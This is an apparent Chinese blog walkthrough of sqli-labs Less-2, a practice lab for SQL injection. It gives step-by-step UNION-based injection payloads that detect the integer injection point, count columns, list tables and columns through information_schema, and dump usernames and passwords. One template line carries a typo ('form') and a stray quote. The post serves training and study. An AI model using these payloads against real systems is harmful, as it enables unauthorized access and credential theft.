[网络安全]sqli-labs Less-2 解题详析

发布时间 2023-05-02 22:16:16作者: 秋说
往期回顾:[[网络安全]sqli-labs Less-1 解题详析](https://blog.csdn.net/2301_77485708/article/details/130410800?spm=1001.2014.3001.5502)

判断注入类型

GET1 and 1=1,回显如下:
在这里插入图片描述
GET1 and 1=2,没有回显:
在这里插入图片描述说明该漏洞类型为整型注入。

判断注入点个数

GET1 order by 3,回显如下:
在这里插入图片描述GET1 order by 4,回显如下:
在这里插入图片描述说明注入点个数为3个
即可构造语句如下

-1' union select 1,2,xx form xx; --+

查库名

-1 union select 1,2,database(); --+

在这里插入图片描述

查表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'; --+

在这里插入图片描述

查users表的列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'; --+

在这里插入图片描述

查字段

-1 union select 1,group_concat(password),group_concat(username) from security.users; --+

在这里插入图片描述

注意

group_concat(password)的回显点在第二点上,对应回显页面中的Your Login name
group_concat(username)的回显点在第三点上,对应回显页面中的Your Password

除此之外,可以单独查询username和password,如下:

-1 union select 1,2,group_concat(username) from security.users; --+

在这里插入图片描述该页面回显即为用户名;


-1 union select 1,2,group_concat(password) from security.users; --+

在这里插入图片描述该页面回显即为密码。

总结

以上为[网络安全]sqli-labs Less-2 解题详析,后续将分享[网络安全]sqli-labs Less-3 解题详析
原理及姿势可参考:[网络安全]SQL注入原理及常见攻击方法简析
我是秋说,我们下次见。